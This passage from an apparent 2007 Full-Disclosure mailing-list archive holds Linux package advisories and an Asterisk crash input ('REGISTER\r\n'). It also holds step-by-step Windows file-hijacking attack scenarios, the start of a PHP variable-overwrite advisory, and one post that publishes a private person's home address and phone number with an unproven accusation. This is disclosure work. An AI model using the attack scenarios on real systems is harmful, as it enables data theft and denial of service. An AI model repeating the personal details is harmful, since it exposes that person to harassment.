76bb6cba723566a5a0a02043d5e02fe2 corporate/3.0/i586/libxine1-devel-1-0.rc3.6.15.C30mdk.i586.rpm 24645aa6d547c1077236248eb54645f0 corporate/3.0/i586/xine-aa-1-0.rc3.6.15.C30mdk.i586.rpm 246938c45fe9d795c96aa349bf8cd107 corporate/3.0/i586/xine-arts-1-0.rc3.6.15.C30mdk.i586.rpm 0af50984ecd9fd2979f3da178871ac1d corporate/3.0/i586/xine-dxr3-1-0.rc3.6.15.C30mdk.i586.rpm 80b08a823d7793fb677bbb121a07f9cb corporate/3.0/i586/xine-esd-1-0.rc3.6.15.C30mdk.i586.rpm 31c8ad519bfab253300f5d575ea22f5b corporate/3.0/i586/xine-flac-1-0.rc3.6.15.C30mdk.i586.rpm 38bcaf1e4bf6f673c0e39048e7701348 corporate/3.0/i586/xine-gnomevfs-1-0.rc3.6.15.C30mdk.i586.rpm 27627560d6c1c7e5aa2fd63bde435b37 corporate/3.0/i586/xine-plugins-1-0.rc3.6.15.C30mdk.i586.rpm 3f124f14f5fa8b1e7e3f3917afda3705 corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.15.C30mdk.src.rpm Corporate 3.0/X86_64: 0182ddc1159b46c24589b397412733e1 corporate/3.0/x86_64/lib64xine1-1-0.rc3.6.15.C30mdk.x86_64.rpm 01cb9805548452a161da99ad385ed474 corporate/3.0/x86_64/lib64xine1-devel-1-0.rc3.6.15.C30mdk.x86_64.rpm b121a2b09b0da74ad2553f94319c2771 corporate/3.0/x86_64/xine-aa-1-0.rc3.6.15.C30mdk.x86_64.rpm 91534b8494ab6ac1eec6c47261f6389b corporate/3.0/x86_64/xine-arts-1-0.rc3.6.15.C30mdk.x86_64.rpm 81d95f1a15722144e856384e4fe4a27b corporate/3.0/x86_64/xine-esd-1-0.rc3.6.15.C30mdk.x86_64.rpm f35de55cb2d1b241c60479728ab84ca0 corporate/3.0/x86_64/xine-flac-1-0.rc3.6.15.C30mdk.x86_64.rpm b83e2f8b1cbf0802077ee0f7bc1ac6ec corporate/3.0/x86_64/xine-gnomevfs-1-0.rc3.6.15.C30mdk.x86_64.rpm aa6982efb1978493f4d278e5d7ee8787 corporate/3.0/x86_64/xine-plugins-1-0.rc3.6.15.C30mdk.x86_64.rpm 3f124f14f5fa8b1e7e3f3917afda3705 corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.15.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF7/rEmqjQ0CJFipgRAtZdAJ94tgd8KDteZ2S363e6T0kKNlNV/ACeMI5H JdD2wOBXCUVX7Vv3c2bdD1Y= =X6nW -----END PGP SIGNATURE----- From noreply at musecurity.com Thu Mar 8 00:09:10 2007 From: noreply at musecurity.com (noreply at musecurity.com) Date: Thu, 8 Mar 2007 00:09:10 +0000 (GMT) Subject: [Full-disclosure] [MU-200703-01] Remote DOS in Asterisk SIP Message-ID: <20070308000912.61A76174@lists.grok.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Remote DOS in Asterisk SIP [MU-200703-01] March 07, 2006 http://labs.musecurity.com/advisories.html Affected Products/Versions: Asterisk versions 1.2.15 and 1.4.0, and earlier versions Product Overview: http://www.asterisk.org/ "Asterisk is the most popular and extensible open source telephone system in the world, offering flexibility, functionality and features not available in advanced, high-end (high-cost) proprietary business systems. Asterisk is a complete IP PBX (private branch exchange) for businesses, and can be downloaded for free." Vulnerability Details: Asterisk crashes when handed an otherwise valid request message but with no URI and no SIP-version in the request-line of the message. For example, "REGISTER\r\n ". The crash is due to a null pointer dereference, and does not appear to be otherwise exploitable. Vendor Response / Solution: Fixed in releases 1.2.16 and 1.4.1. Available from http://www.asterisk.org History: March 1, 2006 - First contact with vendor March 2, 2006 - Vendor acknowledges vulnerability March 7, 2006 - Advisory released Credit: This vulnerability was discovered by the Mu Security research team. http://labs.musecurity.com/pgpkey.txt Mu Security offers a new class of security analysis system, delivering a rigorous and streamlined methodology for verifying the robustness and security readiness of any IP-based product or application. Founded by the pioneers of intrusion detection and prevention technology, Mu Security is backed by preeminent venture capital firms that include Accel Partners, Benchmark Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For more information, visit the company's website at http://www.musecurity.com. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (Darwin) iD8DBQFF71EEMl+docYeP+YRAukhAJ9UtebKpf+EOAVI1yo7oXq+H46/ggCeMpvp WtZuYXJRPBo4e0tP04ljrHM= =I3nE -----END PGP SIGNATURE----- From smithj at foresightlinux.org Wed Mar 7 22:06:06 2007 From: smithj at foresightlinux.org (Jonathan Smith) Date: Wed, 07 Mar 2007 17:06:06 -0500 Subject: [Full-disclosure] FLSA - foresight linux security announcements Message-ID: <45EF374E.1090207@foresightlinux.org> Just a heads up to folks that Foresight Linux [1] will now be publishing security advisories. These advisories will be published as soon as updates for the relevant issues have been pushed. The advisories will be posted to a newly-created mailing list [2] explicitly for this purpose, as well as to FullDisclosure, Bugtraq, and LWN.net. Interested users and developers are encouraged to subscribe to the foresight-security list. Developers who are interested in joining the foresight security team are encouraged to stop by #foresight and say hello. [1]: http://foresightlinux.org [2]: http://lists.rpath.org/mailman/listinfo/foresight-security -smithj From security at mandriva.com Thu Mar 8 15:20:40 2007 From: security at mandriva.com (security at mandriva.com) Date: Thu, 08 Mar 2007 08:20:40 -0700 Subject: [Full-disclosure] [ MDKSA-2007:056 ] - Updated tcpdump packages address off-by-one overflow Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:056 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tcpdump Date : March 8, 2007 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Off-by-one buffer overflow in the parse_elements function in the 802.11 printer code (print-802_11.c) for tcpdump 3.9.5 and earlier allows remote attackers to cause a denial of service (crash) via a crafted 802.11 frame. NOTE: this was originally referred to as heap-based, but it might be stack-based. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: d92b272b29238545670818ca1d03b171 2006.0/i586/tcpdump-3.9.3-1.3.20060mdk.i586.rpm 66d13291c325f4c08725ee28fd57c21d 2006.0/SRPMS/tcpdump-3.9.3-1.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 9a66f32f4fd622c3986a80dd447bad10 2006.0/x86_64/tcpdump-3.9.3-1.3.20060mdk.x86_64.rpm 66d13291c325f4c08725ee28fd57c21d 2006.0/SRPMS/tcpdump-3.9.3-1.3.20060mdk.src.rpm Mandriva Linux 2007.0: 34629bcb6e9ee83b6e9163bd0e3ab889 2007.0/i586/tcpdump-3.9.4-1.1mdv2007.0.i586.rpm ba39819805f0935af53e2ec77b302d14 2007.0/SRPMS/tcpdump-3.9.4-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: e0c4b35447b06600387db895f2ecee54 2007.0/x86_64/tcpdump-3.9.4-1.1mdv2007.0.x86_64.rpm ba39819805f0935af53e2ec77b302d14 2007.0/SRPMS/tcpdump-3.9.4-1.1mdv2007.0.src.rpm Corporate 3.0: f6dc96b67852e9a31868433020500ea1 corporate/3.0/i586/tcpdump-3.8.1-1.3.C30mdk.i586.rpm 978aeb218783686a74e4d2a6e1b772fb corporate/3.0/SRPMS/tcpdump-3.8.1-1.3.C30mdk.src.rpm Corporate 3.0/X86_64: b3440b61b1aaca36fb7426d2108d5a99 corporate/3.0/x86_64/tcpdump-3.8.1-1.3.C30mdk.x86_64.rpm 978aeb218783686a74e4d2a6e1b772fb corporate/3.0/SRPMS/tcpdump-3.8.1-1.3.C30mdk.src.rpm Corporate 4.0: b0d581c7c0166447c32019849638002e corporate/4.0/i586/tcpdump-3.9.3-1.3.20060mlcs4.i586.rpm d849293ac434f50fb2159bf0298a9921 corporate/4.0/SRPMS/tcpdump-3.9.3-1.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: a0955040cd81b0d5189e2b72fdddf459 corporate/4.0/x86_64/tcpdump-3.9.3-1.3.20060mlcs4.x86_64.rpm d849293ac434f50fb2159bf0298a9921 corporate/4.0/SRPMS/tcpdump-3.9.3-1.3.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF7/2XmqjQ0CJFipgRAtBDAKDsiVO4Wq7b5X0/6OmQdodzS42nQwCggOVE D1MbIAalZVXg12JYfnsmM2k= =ySaD -----END PGP SIGNATURE----- From security at mandriva.com Thu Mar 8 15:30:47 2007 From: security at mandriva.com (security at mandriva.com) Date: Thu, 08 Mar 2007 08:30:47 -0700 Subject: [Full-disclosure] [ MDKSA-2007:055 ] - Updated mplayer packages to address buffer overflow vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:055 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mplayer Date : March 8, 2007 Affected: 2007.0, Corporate 3.0 _______________________________________________________________________ Problem Description: The DMO_VideoDecoder_Open function in loader/dmo/DMO_VideoDecoder.c in MPlayer 1.0rc1 and earlier does not set the biSize before use in a memcpy, which allows user-assisted remote attackers to cause a buffer overflow and possibly execute arbitrary code. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: c79b106f66ef06c04a656adbd2dd5caa 2007.0/i586/libdha1.0-1.0-1.pre8.13.1mdv2007.0.i586.rpm 5a596579a15d7092b559bbbd6c319167 2007.0/i586/mencoder-1.0-1.pre8.13.1mdv2007.0.i586.rpm dd6293fb4f03bd361932e385d07f8918 2007.0/i586/mplayer-1.0-1.pre8.13.1mdv2007.0.i586.rpm 0b7a8a5af99b3a3975a3f0f9e0b5c70a 2007.0/i586/mplayer-gui-1.0-1.pre8.13.1mdv2007.0.i586.rpm e90776605fb7d8b2c6c9845431dff696 2007.0/SRPMS/mplayer-1.0-1.pre8.13.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 3ccbf6766332228912f9ca86673ee082 2007.0/x86_64/mencoder-1.0-1.pre8.13.1mdv2007.0.x86_64.rpm d5544ee7ba584ad39c78221947d9f763 2007.0/x86_64/mplayer-1.0-1.pre8.13.1mdv2007.0.x86_64.rpm 7485610e6dae090636fb34c7c41c9343 2007.0/x86_64/mplayer-gui-1.0-1.pre8.13.1mdv2007.0.x86_64.rpm e90776605fb7d8b2c6c9845431dff696 2007.0/SRPMS/mplayer-1.0-1.pre8.13.1mdv2007.0.src.rpm Corporate 3.0: c856e0fc1743cd8f623d7ee8f9e6ffe3 corporate/3.0/i586/libdha0.1-1.0-0.pre3.14.9.C30mdk.i586.rpm 1350f9e69fd481e17b707a94fb1bc74a corporate/3.0/i586/libpostproc0-1.0-0.pre3.14.9.C30mdk.i586.rpm 98d7ca9b74490afb20c44efe098761fa corporate/3.0/i586/libpostproc0-devel-1.0-0.pre3.14.9.C30mdk.i586.rpm 536f8ad600598e2cffce436c1c0e695f corporate/3.0/i586/mencoder-1.0-0.pre3.14.9.C30mdk.i586.rpm 208ea2e10312f1cba5989ecbf43956f3 corporate/3.0/i586/mplayer-1.0-0.pre3.14.9.C30mdk.i586.rpm 1ff79a1c5e08b898a14010305797893c corporate/3.0/i586/mplayer-gui-1.0-0.pre3.14.9.C30mdk.i586.rpm 20150c93e21037f29585075932eb7ef0 corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.9.C30mdk.src.rpm Corporate 3.0/X86_64: 823d5b19da1feead69cb245cbea24ec3 corporate/3.0/x86_64/lib64postproc0-1.0-0.pre3.14.9.C30mdk.x86_64.rpm b4839689ed4d7fd56198b266a913eda6 corporate/3.0/x86_64/lib64postproc0-devel-1.0-0.pre3.14.9.C30mdk.x86_64.rpm f522ed8f9e28c712af8820a21635a387 corporate/3.0/x86_64/mencoder-1.0-0.pre3.14.9.C30mdk.x86_64.rpm 91bb9c93d8d71e8978a0dfc9ba5f7b6e corporate/3.0/x86_64/mplayer-1.0-0.pre3.14.9.C30mdk.x86_64.rpm 10196940030f359d04c345e55c8c98fb corporate/3.0/x86_64/mplayer-gui-1.0-0.pre3.14.9.C30mdk.x86_64.rpm 20150c93e21037f29585075932eb7ef0 corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.9.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF8AEzmqjQ0CJFipgRApNzAJ9RDJuZFdlog1bW7Ol7+vBB1+KFtwCg4ogN 0qj1yJugJ+Mg+6GdPqIulnk= =9Czc -----END PGP SIGNATURE----- From security at mandriva.com Thu Mar 8 15:40:46 2007 From: security at mandriva.com (security at mandriva.com) Date: Thu, 08 Mar 2007 08:40:46 -0700 Subject: [Full-disclosure] [ MDKSA-2007:054 ] - Updated kdelibs packages to address DoS issue in KDE Javascript Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:054 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kdelibs Date : March 8, 2007 Affected: 2007.0, Corporate 4.0 _______________________________________________________________________ Problem Description: ecma/kjs_html.cpp in KDE JavaScript (KJS), as used in Konqueror, allows remote attackers to cause a denial of service (crash) by accessing the content of an iframe with an ftp:// URI in the src attribute, probably due to a NULL pointer dereference. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1308 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 1d8397f15e58c6ebc8add4080524e8ba 2007.0/i586/kdelibs-common-3.5.4-19.3mdv2007.0.i586.rpm f9f0624e36296f15aa5f7bfe51765335 2007.0/i586/kdelibs-devel-doc-3.5.4-19.3mdv2007.0.i586.rpm 36d61d7ad928fbee40606a82028446ad 2007.0/i586/libkdecore4-3.5.4-19.3mdv2007.0.i586.rpm 15b28472271a57c834b27259a29f07da 2007.0/i586/libkdecore4-devel-3.5.4-19.3mdv2007.0.i586.rpm 1763a83f2c1b2fe368983ee87fad4fc2 2007.0/SRPMS/kdelibs-3.5.4-19.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 770bb5b58a92a6e8bf213f814346293c 2007.0/x86_64/kdelibs-common-3.5.4-19.3mdv2007.0.x86_64.rpm 8daded5cdd67051ceca12750140e551c 2007.0/x86_64/kdelibs-devel-doc-3.5.4-19.3mdv2007.0.x86_64.rpm aac88e6d7fd426401bfa11505550dcb4 2007.0/x86_64/lib64kdecore4-3.5.4-19.3mdv2007.0.x86_64.rpm 5c7becc6933c5d13761d561999691594 2007.0/x86_64/lib64kdecore4-devel-3.5.4-19.3mdv2007.0.x86_64.rpm 1763a83f2c1b2fe368983ee87fad4fc2 2007.0/SRPMS/kdelibs-3.5.4-19.3mdv2007.0.src.rpm Corporate 4.0: 358b45acbccb6b99d05748abc02f9dd7 corporate/4.0/i586/kdelibs-arts-3.5.4-2.4.20060mlcs4.i586.rpm 63cd48e403757866aa7979e5d7d906de corporate/4.0/i586/kdelibs-common-3.5.4-2.4.20060mlcs4.i586.rpm 9aa0299ec063ea41d52da7ba446757a4 corporate/4.0/i586/kdelibs-devel-doc-3.5.4-2.4.20060mlcs4.i586.rpm ad7439a70a0dd461073c6d38e73a5622 corporate/4.0/i586/libkdecore4-3.5.4-2.4.20060mlcs4.i586.rpm 9b1fd095f5735fbbc2e337fbb954b524 corporate/4.0/i586/libkdecore4-devel-3.5.4-2.4.20060mlcs4.i586.rpm 2c987a7ed1c263de3dde211cb0dee772 corporate/4.0/SRPMS/kdelibs-3.5.4-2.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 3c1ff52dc6a7347a2648f4c3628a3e3d corporate/4.0/x86_64/kdelibs-arts-3.5.4-2.4.20060mlcs4.x86_64.rpm 1d201913a24f345f77a53ea1ebc850b7 corporate/4.0/x86_64/kdelibs-common-3.5.4-2.4.20060mlcs4.x86_64.rpm 4ec74770c6dc7343092000db74ca5ca0 corporate/4.0/x86_64/kdelibs-devel-doc-3.5.4-2.4.20060mlcs4.x86_64.rpm b4d99dcd875a95c8b1301bcf54860306 corporate/4.0/x86_64/lib64kdecore4-3.5.4-2.4.20060mlcs4.x86_64.rpm 93cfdbf02993812bb52ae0d2e26a0c70 corporate/4.0/x86_64/lib64kdecore4-devel-3.5.4-2.4.20060mlcs4.x86_64.rpm 2c987a7ed1c263de3dde211cb0dee772 corporate/4.0/SRPMS/kdelibs-3.5.4-2.4.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF8APFmqjQ0CJFipgRAgqzAJ9DmuNRfDFu7K1Xd1PqGkwg1dwNAwCeNpf8 +pvpIpYttsl6uOacHpxXXkQ= =+gJf -----END PGP SIGNATURE----- From sniffikins at yahoo.com Thu Mar 8 19:10:06 2007 From: sniffikins at yahoo.com (Jaime Demetur) Date: Thu, 8 Mar 2007 11:10:06 -0800 (PST) Subject: [Full-disclosure] YouTube email exploit being used by Casey Nunez AKA TheDramaTube AKA The Hurricane Message-ID: <565625.60760.qm@web58905.mail.re1.yahoo.com> YouTube user TheDramaTube (AKA The Hurricane) is actively using a YouTube email exploit that, when opened, logs the reader out of their and immediately gives him access. Beware of any messages sent by this user. The last time this exploit was used the subject line was "rfgt". In the body of the email was simply "r". The person who received the email was then logged out and Casey Nunez then had access to their acount, with the victim unable to log back in for a while. Casey Nunez 247 Marmandie Ave., Lot #56 River Ridge, LA 70123-1145 Phone# 504-250-1119 Be safe out there, Jamie --------------------------------- Don't get soaked. Take a quick peek at the forecast with theYahoo! Search weather shortcut. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/de2f5b5e/attachment.html From kokanin at gmail.com Thu Mar 8 20:06:51 2007 From: kokanin at gmail.com (=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=) Date: Thu, 8 Mar 2007 21:06:51 +0100 Subject: [Full-disclosure] YouTube email exploit being used by Casey Nunez AKA TheDramaTube AKA The Hurricane In-Reply-To: <565625.60760.qm@web58905.mail.re1.yahoo.com> References: <565625.60760.qm@web58905.mail.re1.yahoo.com> Message-ID: bla bla bla, evidence or it didn't happen. On 3/8/07, Jaime Demetur wrote: > YouTube user TheDramaTube (AKA The Hurricane) is actively using a YouTube > email exploit that, when opened, logs the reader out of their and > immediately gives him access. Beware of any messages sent by this user. > > The last time this exploit was used the subject line was "rfgt". In the body > of the email was simply "r". The person who received the email was then > logged out and Casey Nunez then had access to their acount, with the victim > unable to log back in for a while. > > Casey Nunez > 247 Marmandie Ave., Lot #56 > River Ridge, LA > 70123-1145 > Phone# 504-250-1119 > > Be safe out there, > Jamie > > > > ________________________________ > Don't get soaked. Take a quick peek at the forecast > with theYahoo! Search weather shortcut. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From 3APA3A at SECURITY.NNOV.RU Thu Mar 8 19:58:37 2007 From: 3APA3A at SECURITY.NNOV.RU (3APA3A) Date: Thu, 8 Mar 2007 22:58:37 +0300 Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues Message-ID: <1199291182.20070308225837@SECURITY.NNOV.RU> This is an article I promised to publish after Windows ReadDirectoryChangesW (CVE-2007-0843) [1] issue. It should explain why you must never place secure data inside insecure directory. Title: Microsoft Windows Vista/2003/XP/2000 file management security issues Author: 3APA3A, http://securityvulns.com/ Vendor: Microsoft (and potentially another vendors) Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit for Windows 2000 and different utilities. Access Vector: Local Type: multiple/complex (weak design, insecure file operations, etc) Original advisory: http://securityvulns.com/advisories/winfiles.asp Securityvulns.com news: http://security.nnov.ru/news/Microsoft/Windows/files.html 0. Intro This article contains a set of attack scenarios to demonstrate security weakness in few very common Windows management practices. Neither of the problem explained is critical, yet combined together they should force you to review your security practices. I can't even say "vulnerabilities" because there is no something you can call "vulnerability". It's just something you believe is secure and it's not. 1.1 Problem: inability to create secured file / folder in public one. Attack: folder hijack attack First, it's simply impossible with standard Windows interface to create something secured in insecure folder. Scenario 1.1: Bob wishes to create "Bob private data" folder in "Public" folder to place few private files. "Public" has at least "Write" permissions for "User" group. Bob: I Creates "Bob private data" folder II Sets permission for folder to only allow access to folder himself III Copies private files into folder Alice wants to get access to folder Bob created. She Ia Immediately after folder is created, deletes "Bob private data" folder and creates "Bob private data" folder again (or simply takes ownership under "Bob private data" folder if permissions allow). It makes Alice folder owner. IIa Immediately after Bob sets permissions, she grants herself full control under folder. She can do it as a folder owner. IIIa Reads Bob's private files, because files permissions are inherited from folder Alice can use "Spydir" (http://securityvulns.com/soft/) tool to monitor files access and automate this process. As you can see, [1] elevates this problem significantly. This is not new attack. Unix has "umask" command to protect administrators and users. Currently, Windows has nothing similar. CreateFile() API supports setting file ACL on file creation (just like open() allows to set mode on POSIX systems). ACL can be securely set only on newly created files. This raises a problem of secure file creation. 1.2 Problem: Inability to lock / securely change permissions of already created file Attack: pre-open file/directory attack. There are few classes of insecure file creation attack (attempt to open existing file), exploitable under Unix with hardlinks or symlinks. It's believed Windows is not vulnerable to this attacks because I. There is no symlinks under Windows. Symlink attacks are not possible. II. Security information in NTFS is not stored as a part of directory entry, it's a part of file data. Hard link attacks are not possible. III. File locks in Windows are mandatory. It means, if one application locks the file, another application can not open this file, if user doesn't have backup privileges. It mitigate different file-based attacks. There is at least one scenario, attacker can succeed without symbolic link: to steal data written to file created without check for file existence regardless of file locks and permissions. Attack description: if attacker can predict filename to be written, he can create file, open it and share this file for all types of access. Because locking and permissions are only checked on file open, attacker retain access to the file even if it's locked and it's permissions are changed to deny file access to attacker. Exploit (or useful tool): http://securityvulns.com/files/spyfile.c Opens file, shares it for different types of access and logs changes, keeping the file open. Compiled version is available from http://securityvulns.com/soft/ Scenario 1.2.1: Bob is now aware about folder hijack attack. He use xcopy /O /U /S to synchronize his files to newly created folder. xcopy /O copies security information (ownership and permissions) before writing data to file. Alice use "Spydir" to monitor newly created folders and files in Bob's directory. She use Spyfile to create spoofed files in target directory and waits for Bob to run xcopy. Now, she has full control under content of Bob's files despite the fact she has no permissions to access these files. In a same way directory content may be monitored by pre-opening directory. Scenario 1.2.2: Enterprise directory structure is replicated every day to another user-writable location in order to alow users to recover suddenly deleted or modified files. xcopy or robocopy (from resource kit) is used for replication. Attacker can hijack content of newly created files in newly created folders. Same problem may happen on archive extraction or backup restoration. Vulnerable applications: xcopy (from all Windows versions), robocopy (Windows 2000 Resource Kit), different archivers backup restoration utilities By default, xcopy warns user the file exists, unless /Y or /U key is specified. But I. /Y is always specified for replication II. /Y can be specified via COPYCMD environment variable. COPYCMD environment variable can be created in autoexec.bat file. Different situations are possible, where autoexec.bat is writable by attacker, if: - Default Windows 2000 permissions are used or applied with domain policy [2]. - One can try to re-create autoexec.bat using POSIX subsystem III. Neither xcopy nor other utilities warn user on existing directory. Pre-open directory attack will always succeed. As you can see, [1] again dramatically elevates this problem. 1.3 Problem: user can completely block access to the files Attack: open file deletion (including Windows file replication service DoS) If files is deleted while it's open, it still present in file system under it's old name until close. Any operation on this file (including attributes requests) fails, regardless of application rights and permissions (including backup ones). Exploit: use spyfile, delete file while it's spied. Now, without closing spyfile, attempt any operation on this file (e.g. try to find it's ownership). Scenario 1.3.1 Now Bob found an copy application to securely copy files. It deletes old file before creating new one. But it fails if Alice tries to spy on Bob files, because attempt to delete file succeeds, but file still present and is unmanageable. Scenario 1.3.2 Windows file replication service (FRS) is used to replicate data between 2 public DFS folders to distribute load. Folder has permissions: Everyone: Add & read Creator Owner: Full Control Thouse, Alice has no permissions to delete files created by Bob. Replicated folder is available as a share on 2 different servers: \\SERVER1\Share and \\SERVER2\Share. Bob is connected to \\SERVER1\Share. Alice uses "Spydir" to monitor files creation by Bob. Every time Bob creates new file on \\SERVER1\Share, Alice use spyfile to create file with same name on \\SERVER2\Share. It effectively leads to FRS collision. While trying to resolve collision, FRS fails to delete file created by Alice and Bob file is deleted (original file is moved to special hidden folder only accessible by administrator). Workaround: never try to use creator-owner based permissions in replicated folders. Again, [1] seriously escalates this problem. 2. Conclusion: It's simply impossible to securely create something in public folder. At least DoS conditions are always possible. Developers should not consider mandatory file locking as a security feature. Developers should care about secure file creation to store sensitive information. CREATE_NEW should always be used and ACL should be set with lpSecurityAttributes of CreateFile. No attempt to open existing file should be made. Never try to create secure folder in public one. If you are forced, disconnect all users before this operation. Never use replication, archive extraction or backup restore to user-accessible folder. Bob and Alice should finally marry. 3. Vendor: All timelines are same with [1]. [1]. Microsoft Windows ReadDirectoryChangesW information leak (CVE-2007-0843) http://security.nnov.ru/news/Microsoft/Windows/ReadDirector.html [2]. Windows 2000 system partition weak default permissions http://securityvulns.ru/news2205.html -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/ From stefano.dipaola at wisec.it Thu Mar 8 22:30:49 2007 From: stefano.dipaola at wisec.it (Stefano Di Paola) Date: Thu, 08 Mar 2007 23:30:49 +0100 Subject: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite Message-ID: <1173393049.9040.10.camel@laptop> PHP import_request_variables() arbitrary variable overwrite Name Using import_request_variables() you can overwrite $_* and $* (any php variable). Systems Affected PHP >=4.0.7 <=5.2.1 Severity High Vendor http://www.php.net/ Advisory http://www.wisec.it/vulns.php?id=10 http://www.wisec.it/vuln_10.txt Authors Stefano `wisec` di Paola (stefano.dipaola at wisec.it) Francesco `ascii` Ongaro (ascii at ush.it) Date 20060307 I. BACKGROUND PHP is a scripting language. Since in the past PHP enabled by default GLOBALS programmers wrote applications using this input method, nowadays the globals on configuration has gone (while still used by many web hosting companies) and programmers instead rewriting their code wrote added patches to re implement superglobals their own. These codes gave developers more troubles than benefits so PHP developers wrote a function to securely import a part of the whole "_REQUEST", this function is named import_request_variables() and exists since PHP 4.0.7. II. DESCRIPTION >From the PHP manual: [quote] Imports GET/POST/Cookie variables into the global scope. It is useful if you disable register_globals, but would like to see some variables in the global scope. [/quote] So import_request_variables() emulate register globals on and is a bit different from extract(). [quote] Note: Although the prefix parameter is optional, you will get an E_NOTICE level error if you specify no prefix, or specify an empty string as a prefix. This is a possible security hazard. Notice level errors are not displayed using the default error reporting level. [/quote] They warn you about the prefix thing, this is right for two reasons: the first is that without prefix you have the same problems of globals on (but it's also true that if you code everything with the prefix you return to the starting point. The second is the one explained in this advisory: using the function import_request_variables() enable people to overwrite the following arrays: $_GET $_POST $_COOKIE $_FILES $_SERVER $_SESSION and all the others not mentioned. We are conducting further investigations on _FILES, it seems possible to overwrite the array but we are not sure that it could be used to trick file upload scripts. Given the specified entry points (the first argument of the function is a case insensitive string of the input methods that will be imported, G for GET, P for POST and C for COOKIE) a remote attacker will be able to overwrite any internal and protected array. The result is that if you use REGISTER GLOBALS ON you are MUCH MORE safe. There is a little bonus: as highlighted in the code snippets on the following ANALYSIS section the P char will enable both POST and FILES entry point so import_request_variables('GPC') will give a global scope to everything specified in GET POST COOKIE and FILES. III. ANALYSIS import_request_variables() is not new to vulnerabilities: consider this change log entry for 24 Nov 2005, PHP 5.1. [quote] - Fixed potential GLOBALS overwrite via import_request_variables() and possible 